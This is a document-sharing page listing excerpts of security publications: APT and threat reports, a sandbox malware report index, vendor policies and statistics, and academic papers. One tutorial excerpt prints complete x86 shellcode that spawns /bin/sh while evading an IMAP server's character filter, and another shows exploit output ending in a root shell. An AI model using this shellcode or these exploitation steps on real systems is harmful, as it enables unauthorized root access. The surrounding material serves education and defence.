Aladdin's Lamp: the Theft and Re-Weaponization of Malicious Code
Total Page:16
File Type:pdf, Size:1020Kb
Load more
Recommended publications
-
Advanced Persistent Threats
THREAT RESEARCH Defending Against Advanced Persistent Threats Introduction As the name “Advanced” suggests, APT (advanced persistent threat) is one of the most sophisticated and organized forms of network attacks that keep cybersecurity professionals up at night. Unlike many hit & run traditional cyberattacks, an APT is carried out over a prolonged period of time by skilled threat actors who strategize multi-staged campaigns against their targets, employing clandestine tools & techniques such as Remote Administration Tools (RAT), Toolkits, Backdoor Trojans, Social Engineering, DNS Tunneling etc. These experienced cybercriminals are mostly backed & well-funded by nation states and corporation-backed organizations to specifi cally target high value organizations with the following objectives in mind: a Theft of Intellectual Property & classifi ed data i.e. Cyber Espionage a Access to critical & sensitive communications a Access to credentials of critical systems a Sabotage or exfi ltration of databases a Theft of Personal Identifi able Information (PII) a Access to critical infrastructure to perform internal reconnaissance To achieve the above goals, APT Groups use novel techniques to obfuscate their actions and easily bypass traditional security barriers that are not advancing at the same rate as the sophisticated attack patterns of cybercriminals. To understand the evolved behavioral pattern of APT Groups in the year 2020, a review of their latest activities revealed interesting developments and a few groundbreaking events¹: a Southeast Asia -
Automated Malware Analysis Report for Shellcode.Exe
ID: 205432 Sample Name: shellcode.exe Cookbook: default.jbs Time: 00:40:30 Date: 04/02/2020 Version: 28.0.0 Lapis Lazuli Table of Contents Table of Contents 2 Analysis Report shellcode.exe 3 Overview 3 General Information 3 Detection 3 Confidence 3 Classification 4 Analysis Advice 4 Mitre Att&ck Matrix 5 Signature Overview 5 AV Detection: 5 System Summary: 5 Data Obfuscation: 5 Malware Configuration 5 Behavior Graph 5 Simulations 6 Behavior and APIs 6 Antivirus, Machine Learning and Genetic Malware Detection 6 Initial Sample 6 Dropped Files 6 Unpacked PE Files 6 Domains 6 URLs 6 Yara Overview 7 Initial Sample 7 PCAP (Network Traffic) 7 Dropped Files 7 Memory Dumps 7 Unpacked PEs 7 Sigma Overview 7 Joe Sandbox View / Context 7 IPs 7 Domains 7 ASN 7 JA3 Fingerprints 7 Dropped Files 7 Created / dropped Files 8 Domains and IPs 8 Contacted Domains 8 Contacted IPs 8 Static File Info 8 General 8 File Icon 8 Static PE Info 8 General 8 Entrypoint Preview 9 Data Directories 10 Sections 10 Imports 11 Network Behavior 11 Code Manipulations 11 Statistics 11 System Behavior 11 Disassembly 11 Copyright Joe Security LLC 2020 Page 2 of 11 Analysis Report shellcode.exe Overview General Information Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 205432 Start date: 04.02.2020 Start time: 00:40:30 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 2m 15s Hypervisor based Inspection enabled: false Report type: light Sample file name: shellcode.exe Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit (version 1803) -
Smashing the Stack for Fun and Profit
Introduction Since the famous article "Smashing the Stack for fun and profit" by aleph1 there have been countless papers about buffer overflows, why then should there be another one? Because I have read most of them and they lack the specifics of the technique, why everything happens and how to react in case of a change and why you have to react. Most of the papers out there are really notes. I can say that this has been explicitly written as a formal paper. Examples are made and also live examples are done of the different techniques and they all should work, if they don't drop me an email, although they have been tested on Slackware 7.0, 7.1 and RedHat 6.0, 6.2 and 7.0, all examples have been revisited on Slackware 9.0, RedHat 8.0 and Mandrake 9.0, Windows 2000 and Solaris on SPARC architecture. During this chapter we will have some standards, I'll use and example to illustrate them: nahual@fscking$ ./exploit1 [ + ] Example 1 for The Tao of Buffer Overflows [ + ] [ + ] Coded by Enrique A. Sanchez Montellano [ + ] Using address 0xbffff9c0 [ + ] Starting exploitation... bash# id As you can see now we've exploited the program uid=0(root) gid=0(root) bash# So as you can see user input will have this type of font, the computer will have normal and comments will have this type of font. And the Tao was born. Functions like strcpy(), strcat(), gets(), sprintf() and all its derivates can be dangerous if not used with care. Why are they not used with care?, Books and classes are not taught with security in mind, the concept of buffer overflows is a concept that is solely for security consultants and hackers, being the first a ramification of the later as far as a lot of people are concerned, so you need special skills to find them and exploit them. -
What Every CEO Needs to Know About Cybersecurity
What Every CEO Needs to Know About Cybersecurity Decoding the Adversary AT&T Cybersecurity Insights Volume 1 AT&T Cybersecurity Insights: Decoding the Adversary 1 Contents 03 Letter from John Donovan Senior Executive Vice President AT&T Technology and Operations 04 Executive Summary 05 Introduction 07 Outsider Threats 15 Looking Ahead: Outsider Threats 16 Best Practices: Outsiders 18 Insider Threats 24 Looking Ahead: New Potential Threats 25 Looking Ahead: Emerging Risks 26 Best Practices: Malicious Insiders 27 Best Practices: Unintentional Insiders 28 Moving Forward 32 Conclusion 33 Know the Terms For more information: Follow us on Twitter @attsecurity 35 End Notes and Sources Visit us at: Securityresourcecenter.att.com © 2015 AT&T Intellectual Property. All rights reserved. AT&T, the AT&T Globe logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual Property and/or AT&T affiliated companies. The information contained herein is not an offer, commitment, representation or warranty by AT&T and is subject to change. 2 ATT.com/network-security Business leader, Welcome to the inaugural issue of AT&T Cybersecurity Insights, a comprehensive look at our analysis and findings from deep inside AT&T’s network operations groups, outside research firms, and network partners. This first issue, “Decoding the Adversary,” focuses on whether or not you and your board of directors are doing enough to protect against cyber threats. Security is not simply a CIO, CSO, or IT department issue. Breaches, leaked documents, and cybersecurity attacks impact stock prices and competitive edge. It is a responsibility that must be shared amongst all employees, and CEOs and board members must proactively mitigate future challenges. -
Security News Digest July 25, 2017
Security News Digest July 25, 2017 Canada will remain where it is for a long time to come, but the Canada’s Security Scene Quiz will move to the Information Security Awareness previous quizzes page at the end of July. Watch this space for the August feature! August 1st is acknowledged across the globe as World Wide Web Day! World Wide Web Day, marks the birth of the Web in August 1990 at the Europe Laboratory for Particle Physics (CERN) in Switzerland. Tim Berners-Lee and Robert Cailliau developed a prototype Web browser and introduced Hypertext Markup Language, HTML. The first ever website was published on August 6, 1991 and served up a page explaining the World Wide Web project and giving information on how users could setup a web server and how to create their own websites and web pages, as well as how they could search the web for information. The URL for the first ever web page put up on the first ever website was http://info.cern.ch/hypertext/WWW/TheProject.html The World Wide Web ('WWW' or simply the 'Web') is a global information medium which users can read and write via computers connected to the Internet. The term [web] is often mistakenly used as a synonym for the Internet itself, but the Web is a service that operates over the Internet, just as e-mail also does. The history of the Internet dates back significantly further than that of the World Wide Web. On July 21st, the Google “Doodle” honoured Canadian Marshall McLuhan! [“the Medium is the Message”] Who is Marshall McLuhan? Meet the Canadian Media Theorist Who Predicted the Internet http://nationalpost.com/news/canada/who-is-marshall-mcluhan-how-a-canadian-media-theorist-predicted-the- internet/wcm/194cb7e2-e778-4780-9aba-6eb94831fcc5 Canadian professor Marshall McLuhan rose to prominence as a media theorist while teaching at the University of Toronto in the 1960s. -
13Th International Conference on Cyber Conflict: Going Viral 2021
2021 13th International Conference on Cyber Confict: Going Viral T. Jančárková, L. Lindström, G. Visky, P. Zotz (Eds.) 2021 13TH INTERNATIONAL CONFERENCE ON CYBER CONFLICT: GOING VIRAL Copyright © 2021 by NATO CCDCOE Publications. All rights reserved. IEEE Catalog Number: CFP2126N-PRT ISBN (print): 978-9916-9565-4-0 ISBN (pdf): 978-9916-9565-5-7 COPYRIGHT AND REPRINT PERMISSIONS No part of this publication may be reprinted, reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior written permission of the NATO Cooperative Cyber Defence Centre of Excellence ([email protected]). This restriction does not apply to making digital or hard copies of this publication for internal use within NATO, or for personal or educational use when for non-proft or non-commercial purposes, providing that copies bear this notice and a full citation on the frst page as follows: [Article author(s)], [full article title] 2021 13th International Conference on Cyber Confict: Going Viral T. Jančárková, L. Lindström, G. Visky, P. Zotz (Eds.) 2021 © NATO CCDCOE Publications NATO CCDCOE Publications LEGAL NOTICE: This publication contains the opinions of the respective authors only. They do not Filtri tee 12, 10132 Tallinn, Estonia necessarily refect the policy or the opinion of NATO Phone: +372 717 6800 CCDCOE, NATO, or any agency or any government. NATO CCDCOE may not be held responsible for Fax: +372 717 6308 any loss or harm arising from the use of information E-mail: [email protected] contained in this book and is not responsible for the Web: www.ccdcoe.org content of the external sources, including external websites referenced in this publication. -
Mcafee Potentially Unwanted Programs (PUP) Policy March, 2018
POLICY McAfee Potentially Unwanted Programs (PUP) Policy March, 2018 McAfee recognizes that legitimate technologies such as commercial, shareware, freeware, or open source products may provide a value or benefit to a user. However, if these technologies also pose a risk to the user or their system, then users should consent to the behaviors exhibited by the software, understand the risks, and have adequate control over the technology. McAfee refers to technologies with these characteristics as “potentially unwanted program(s),” or “PUP(s).” The McAfee® PUP detection policy is based on the process includes assessing the risks to privacy, security, premise that users should understand what is being performance, and stability associated with the following: installed on their systems and be notified when a ■ Distribution: how users obtain the software including technology poses a risk to their system or privacy. advertisements, interstitials, landing-pages, linking, PUP detection and removal is intended to provide and bundling notification to our users when a software program or technology lacks sufficient notification or control over ■ Installation: whether the user can make an informed the software or fails to adequately gain user consent to decision about the software installation or add- the risks posed by the technology. McAfee Labs is the ons and can adequately back out of any undesired McAfee team responsible for researching and analyzing installations technologies for PUP characteristics. ■ Run-Time Behaviors: the behaviors exhibited by the technology including advertisements, deception, and McAfee Labs evaluates technologies to assess any impacts to privacy and security risks exhibited by the technology against the degree of user notification and control over the technology. -
Network Security Project Buffer Overflow Exploitation
Network Security Project Buffer Overflow Exploitation Samuele Andreoli Nicol`oFornari Giuseppe Vitto Abstract In computer security a buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations. This is a special case of the violation of memory safety. Buffer overflows can alter the way the program operates. This may result in erratic program be- havior, including memory access errors, incorrect results, crashes or a breach in system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited. [1] Buffer overflow is a complex and broad topic which requires a solid background in memory man- agement and code execution to be understood (i.e. registers, jumps, interrupts, stack frames). In this project we try to give a taste of stack-based buffer overflow putting our efforts into achieving a linear and relatively simple explanation of the topic. Report layout In Section 1 we describe all the technical details of our working environment. In Section 2 we recall some theoretical background about pointers, registers, etc. With Section 3 the lab starts: we briefly explain how the memory works by introducing gdb, which will be fundamental for the rest of the exercises 1. In Section 4 we present a first buffer overflow that allows the user to access a function which is not intended to be invoked. This is done by overwriting the value of a function pointer. In Section 5 we exploit a buffer overflow in order to execute a shellcode. The main reference for this part is the ground-breaking article Smashing The Stack For Fun And Profit by Aleph One [2]. -
Kaspersky Security Bulletin 2020. Statistics Kaspersky Security Bulletin 2020
Kaspersky Security Bulletin 2020. Statistics Kaspersky Security Bulletin 2020. Statistics Contents Figures of the year 3 Financial threats 4 Number of users attacked by banking malware 4 Attack geography 5 Top 10 financial malware families 6 Ransomware programs 7 Number of users attacked by ransomware Trojans 7 Attack geography 8 Miners 10 Number of users attacked by miners 10 Attack geography 11 Vulnerable applications used by cybercriminals during cyber attacks 12 Attacks on macOS 14 Threat geography 15 IoT attacks 17 IoT threat statistics 17 Threats loaded into traps 19 Attacks via web resources 20 Countries that are sources of web-based attacks: 20 Countries where users faced the greatest risk of online infection 21 Top 20 malicious programs most actively used in online attacks 22 Local threats 24 Top 20 malicious objects detected on user computers 24 Countries where users faced the highest risk of local infection 25 2 Kaspersky Security Bulletin 2020. Statistics Figures of the year • During the year, 10.18% of Internet user computers worldwide experienced at least one Malware-class attack. • Kaspersky solutions blocked 666,809,967 attacks launched from online resources in various countries across the world. • 173,335,902 unique URLs were recognized as malicious by Web Anti-Virus. • Our Web Anti-Virus blocked 33,412,568 unique malicious objects. • Ransomware attacks were defeated on the computers of 549,301 unique users. • During the reporting period, miners attacked 1,523,148 unique users. • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of 668,619 users. -
The Art of Writing Shellcode, by Smiler
The Art of Writing Shellcode, by smiler. ---------------------------------------- Hopefully you are familiar with generic shell-spawning shellcode. If not read Aleph's text "Smashing The Stack For Fun And Profit" before reading further. This article will concentrate on the types of shellcode needed to exploit daemons remotely. Generally it is much harder to exploit remote daemons, because you do not have many ways of finding out the configuration of the remote server. Often the shellcode has to be much more complicated, which is what this article will focus on. I will start by looking at the ancient IMAP4 exploit. This is a fairly simple exploit. All you need to do is "hide" the /bin/sh" string in shellcode (imapd converts all lowercase characters into uppercase). None of the instructions in the generic shell-spawning shellcode contain lower-case characters, so you all you need do is change the /bin/sh string. It is the same as normal shellcode, except there is a loop which adds 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so even beginners can understand it. Sorry to all those asm virtuosos :] -----imap.S------- .globl main main: jmp call start: popl %ebx /* get address of /bin/sh */ movl %ebx,%ecx /* copy the address to ecx */ addb $0x6,%cl /* ecx now points to the last character */ loop: cmpl %ebx,%ecx jl skip /* if (ecx<ebx) goto skip */ addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */ decb %cl /* move the pointer down by one */ jmp loop skip: /* generic shell-spawning code */ movl %ebx,0x8(%ebx) xorl %eax,%eax movb %eax,0x7(%ebx) movl %eax,0xc(%ebx) movb $0xb,%al leal 0x8(%ebx),%ecx leal 0xc(%ebx),%edx int $0x80 xorl %eax,%eax inc %al int $0x80 call: call start .string "\x0f\x42\x49\x4e\x0f\x53\x48" -------------- This was a very simple variation on the generic shellcode and can be useful to mask characters that aren't allowed by the protocol the daemon uses. -
Trojans and Malware on the Internet an Update
Attitude Adjustment: Trojans and Malware on the Internet An Update Sarah Gordon and David Chess IBM Thomas J. Watson Research Center Yorktown Heights, NY Abstract This paper continues our examination of Trojan horses on the Internet; their prevalence, technical structure and impact. It explores the type and scope of threats encountered on the Internet - throughout history until today. It examines user attitudes and considers ways in which those attitudes can actively affect your organization’s vulnerability to Trojanizations of various types. It discusses the status of hostile active content on the Internet, including threats from Java and ActiveX, and re-examines the impact of these types of threats to Internet users in the real world. Observations related to the role of the antivirus industry in solving the problem are considered. Throughout the paper, technical and policy based strategies for minimizing the risk of damage from various types of Trojan horses on the Internet are presented This paper represents an update and summary of our research from Where There's Smoke There's Mirrors: The Truth About Trojan Horses on the Internet, presented at the Eighth International Virus Bulletin Conference in Munich Germany, October 1998, and Attitude Adjustment: Trojans and Malware on the Internet, presented at the European Institute for Computer Antivirus Research in Aalborg, Denmark, March 1999. Significant portions of those works are included here in original form. Descriptors: fidonet, internet, password stealing trojan, trojanized system, trojanized application, user behavior, java, activex, security policy, trojan horse, computer virus Attitude Adjustment: Trojans and Malware on the Internet Trojans On the Internet… Ever since the city of Troy was sacked by way of the apparently innocuous but ultimately deadly Trojan horse, the term has been used to talk about something that appears to be beneficial, but which hides an attack within. -
Cybercrime-As-A-Service: Identifying Control Points to Disrupt Keman Huang Michael Siegel Stuart Madnick
Cybercrime-as-a-Service: Identifying Control Points to Disrupt Keman Huang Michael Siegel Stuart Madnick Working Paper CISL# 2017-17 November 2017 Cybersecurity Interdisciplinary Systems Laboratory (CISL) Sloan School of Management, Room E62-422 Massachusetts Institute of Technology Cambridge, MA 02142 Cybercrime-as-a-Service: Identifying Control Points to Disrupt KEMAN HUANG, MICHAEL SIEGEL, and STUART MADNICK, Massachusetts Institute of Technology Cyber attacks are increasingly menacing businesses. Based on literature review and publicly available reports, this paper analyses the growing cybercrime business and some of the reasons for its rapid growth. A value chain model is constructed and used to describe 25 key value-added activities, which can be offered on the Dark Web as a service, i.e., “cybercrime-as-a-service,” for use in a cyber attack. Understanding the specialization, commercialization, and cooperation of these services for cyber attacks helps to anticipate emerging cyber attack services. Finally, this paper identifies cybercrime control-points that could be disrupted and strategies for assigning defense responsibilities to encourage collaboration. CCS Concepts: • General and reference Surveys and overviews; • Social and professional topics Computing and business; Socio-technical systems; Computer crime; • Security and privacy Social aspects of security and privacy; → → → Additional Key Words and Phrases: Cyber Attack Business; Value Chain Model; Cyber-crime-as-a-Service; Hacking Innovation; Control Point; Sharing Responsibility 1 INTRODUCTION “Where there is commerce, there is also the risk for cybercrime”[139]. Cybercrime is a tremendous threat to today’s digital society. It is extimated that the cost of cybercrime will grow from an annual sum of $3 trillion in 2015 to $6 trillion by the year 2021 [115].